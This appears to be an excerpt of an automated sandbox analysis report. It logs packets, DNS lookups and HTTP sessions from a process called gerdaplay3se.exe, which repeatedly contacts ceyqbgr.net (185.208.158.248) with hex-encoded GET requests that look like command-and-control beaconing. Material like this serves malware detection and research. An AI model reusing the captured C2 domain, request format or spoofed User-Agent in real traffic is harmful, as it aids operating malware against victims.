                                                                                Sep 27, 2024 17:32:42.250933886 CEST5756680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.365155935 CEST5756680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.365473986 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.370364904 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:42.370456934 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.370565891 CEST8057566185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:42.370582104 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.370620012 CEST5756680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:42.375344038 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.068851948 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.068978071 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.177799940 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.182832956 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.421175957 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.421271086 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.536762953 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.537163019 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.542056084 CEST8057567185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.542130947 CEST5756780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.542273998 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:43.542337894 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.542486906 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:43.547504902 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.253375053 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.253484964 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:47.366082907 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:47.371035099 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.601715088 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.601826906 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:47.710699081 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:47.715781927 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.946191072 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:47.946316004 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.068413019 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.068732023 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.074109077 CEST8057568185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.074168921 CEST8057570185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.074177027 CEST5756880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.074255943 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.074552059 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.081239939 CEST8057570185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.796789885 CEST8057570185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.796978951 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.912103891 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.912491083 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.917408943 CEST8057570185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.917491913 CEST5757080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.917602062 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:48.917675972 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.917807102 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:48.922657967 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:49.613887072 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:49.614077091 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:49.726095915 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:49.730937958 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:49.962387085 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:49.962516069 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.085444927 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.085735083 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.090773106 CEST8057571185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.090848923 CEST5757180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.090889931 CEST8057572185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.090967894 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.091181993 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.095956087 CEST8057572185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.807029009 CEST8057572185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.807143927 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.929296017 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.929563999 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.935077906 CEST8057573185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.935179949 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.935319901 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.935528994 CEST8057572185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:50.935590029 CEST5757280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:50.940107107 CEST8057573185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:51.669373989 CEST8057573185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:51.669495106 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.786983013 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.787242889 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.792606115 CEST8057574185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:51.792681932 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.792768002 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.793083906 CEST8057573185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:51.793134928 CEST5757380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:51.800431013 CEST8057574185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:52.719605923 CEST8057574185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:52.719677925 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.833884001 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.834177017 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.849026918 CEST8057574185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:52.849086046 CEST5757480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.849510908 CEST8057575185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:52.849574089 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.849694967 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:52.863738060 CEST8057575185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:53.621285915 CEST8057575185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:53.621360064 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.740159988 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.740453959 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.750010014 CEST8057576185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:53.750096083 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.750183105 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.750972033 CEST8057575185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:53.751030922 CEST5757580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:53.758719921 CEST8057576185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:54.453270912 CEST8057576185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:54.453355074 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.568293095 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.568598986 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.573776960 CEST8057577185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:54.573868036 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.574004889 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.574206114 CEST8057576185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:54.574263096 CEST5757680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:54.581118107 CEST8057577185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:55.379906893 CEST8057577185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:55.380007982 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.489829063 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.490127087 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.496745110 CEST8057577185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:55.496815920 CEST5757780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.496856928 CEST8057578185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:55.496922970 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.497025967 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:55.504401922 CEST8057578185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:56.275300026 CEST8057578185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:56.275356054 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.397588015 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.397958994 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.430785894 CEST8057579185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:56.430984020 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.431134939 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.438292980 CEST8057578185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:56.438359022 CEST5757880192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:56.462378979 CEST8057579185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:57.201956987 CEST8057579185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:57.202033997 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.319653988 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.320053101 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.325484037 CEST8057579185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:57.325563908 CEST5757980192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.326075077 CEST8057580185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:57.326159954 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.326319933 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:57.331476927 CEST8057580185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.046159029 CEST8057580185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.046291113 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.163719893 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.164024115 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.169105053 CEST8057581185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.169295073 CEST8057580185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.169495106 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.169517040 CEST5758080192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.169636965 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:58.175813913 CEST8057581185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.953360081 CEST8057581185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:58.953476906 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.071332932 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.071332932 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.109551907 CEST8057582185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:59.109632969 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.110501051 CEST8057581185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:59.110551119 CEST5758180192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.111211061 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:32:59.143480062 CEST8057582185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:59.949852943 CEST8057582185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:32:59.949927092 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.070136070 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.070344925 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.077785969 CEST8057583185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.077867985 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.078115940 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.079125881 CEST8057582185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.079174995 CEST5758280192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.085407972 CEST8057583185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.771852970 CEST8057583185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.772028923 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.898545027 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.901865005 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.904252052 CEST8057583185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.905940056 CEST5758380192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.907296896 CEST8057584185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:00.909960985 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.913867950 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:00.918843985 CEST8057584185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:01.633050919 CEST8057584185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:01.633141994 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.741727114 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.741858959 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.747342110 CEST8057585185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:01.747425079 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.747680902 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.747728109 CEST8057584185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:01.747814894 CEST5758480192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:01.754822969 CEST8057585185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:02.490453959 CEST8057585185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:02.493932009 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.617552996 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.617964029 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.629470110 CEST8057586185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:02.629623890 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.629847050 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.630692959 CEST8057585185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:02.633950949 CEST5758580192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:02.642290115 CEST8057586185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:03.387306929 CEST8057586185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:03.387367964 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.509114981 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.509476900 CEST5758780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.518225908 CEST8057586185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:03.518286943 CEST5758680192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.518698931 CEST8057587185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:03.518755913 CEST5758780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.518883944 CEST5758780192.168.2.6185.208.158.248
                                                                                Sep 27, 2024 17:33:03.529381037 CEST8057587185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:04.246556997 CEST8057587185.208.158.248192.168.2.6
                                                                                Sep 27, 2024 17:33:04.249908924 CEST5758780192.168.2.6185.208.158.248
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Sep 27, 2024 17:31:28.681607962 CEST5362292162.159.36.2192.168.2.6
                                                                                Sep 27, 2024 17:31:29.153625965 CEST5107853192.168.2.61.1.1.1
                                                                                Sep 27, 2024 17:31:29.161782980 CEST53510781.1.1.1192.168.2.6
                                                                                Sep 27, 2024 17:31:52.667908907 CEST5951853192.168.2.691.211.247.248
                                                                                Sep 27, 2024 17:31:52.706096888 CEST535951891.211.247.248192.168.2.6
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Sep 27, 2024 17:31:29.153625965 CEST192.168.2.61.1.1.10x2676Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Sep 27, 2024 17:31:52.667908907 CEST192.168.2.691.211.247.2480x49d6Standard query (0)ceyqbgr.netA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Sep 27, 2024 17:31:29.161782980 CEST1.1.1.1192.168.2.60x2676Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Sep 27, 2024 17:31:52.706096888 CEST91.211.247.248192.168.2.60x49d6No error (0)ceyqbgr.net185.208.158.248A (IP address)IN (0x0001)false
                                                                                • ceyqbgr.net
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.657519185.208.158.248804052C:\Users\user\AppData\Local\Gerda Play3 SE\gerdaplay3se.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Sep 27, 2024 17:31:52.756558895 CEST318OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c440db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf815c5ee949b32 HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:53.456573963 CEST576INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 31 37 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 33 34 36 61 63 37 30 66 65 37 39 61 62 33 37 35 33 64 65 66 66 64 34 30 30 63 61 34 36 63 64 37 64 62 62 31 33 66 65 32 64 38 38 32 37 65 30 30 65 61 37 36 33 63 32 34 64 62 38 65 32 34 34 65 62 35 61 37 66 34 33 65 37 32 63 36 66 38 62 33 33 36 37 39 30 66 65 31 34 63 30 66 31 39 34 39 61 33 38 63 37 36 39 39 36 31 36 64 38 35 62 38 63 32 62 61 38 35 62 62 32 65 64 34 31 32 30 65 38 37 63 63 63 66 66 37 62 62 66 38 35 65 63 64 35 34 61 65 36 33 35 63 38 31 65 33 30 34 33 35 62 32 34 65 32 33 62 37 34 30 62 37 38 62 30 65 36 38 65 66 65 38 36 32 64 34 37 62 37 31 39 33 66 37 39 39 31 37 36 30 32 61 30 61 35 62 39 38 31 65 63 36 66 33 65 65 30 62 35 32 38 64 32 64 35 62 38 33 39 32 61 30 [TRUNCATED]
                                                                                Data Ascii: 17067b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07346ac70fe79ab3753deffd400ca46cd7dbb13fe2d8827e00ea763c24db8e244eb5a7f43e72c6f8b336790fe14c0f1949a38c7699616d85b8c2ba85bb2ed4120e87cccff7bbf85ecd54ae635c81e30435b24e23b740b78b0e68efe862d47b7193f79917602a0a5b981ec6f3ee0b528d2d5b8392a05ef34b0cb90bf67d460012e346fa55ecbed0
                                                                                Sep 27, 2024 17:31:56.101192951 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:56.349338055 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Sep 27, 2024 17:31:56.460501909 CEST326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ec948344815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b413e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed929e3ecc6e971f HTTP/1.1
                                                                                Host: ceyqbgr.net
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Sep 27, 2024 17:31:56.885082006 CEST431INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90
                                                                                Sep 27, 2024 17:31:57.185530901 CEST431INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 30 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 37 38 61 64 32 65 61 31 61 31 37 66 35 61 31 35 30 65 63 31 64 64 35 66 65 38 33 65 37 39 31 38 37 34 64 38 62 34 66 64 32 66 62 64 63 33 35 33 33 62 39 34 64 66 62 64 33 64 61 31 61 32 31 65 33 37 31 35 38 61 64 37 35 66 64 36 66 61 31 32 64 35 64 63 30 65 30 64 32 30 64 63 30 35 64 63 63 37 64 62 33 31 61 66 39 33 33 38 61 32 36 65 66 31 33 61 37 37 38 63 37 35 32 62 66 66 64 34 66 65 38 35 64 36 31 34 31 65 65 32 32 36 64 39 36 33 62 36 37 38 65 66 34 31 30 63 38 65 61 38 62 39 62 33 66 63 63 37 31 39 30 31 35 63 36 35 39 38 35 32 39 62 36 35 39 62 33 64 39 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e067b69c953804b26b565fe95b321bd19a55f78ad2ea1a17f5a150ec1dd5fe83e791874d8b4fd2fbdc3533b94dfbd3da1a21e37158ad75fd6fa12d5dc0e0d20dc05dcc7db31af9338a26ef13a778c752bffd4fe85d6141ee226d963b678ef410c8ea8b9b3fcc719015c6598529b659b3d90
                                                                                Sep 27, 2024 17:31:57.185894012 CEST431INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Fri, 27 Sep 2024 15:31:56 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
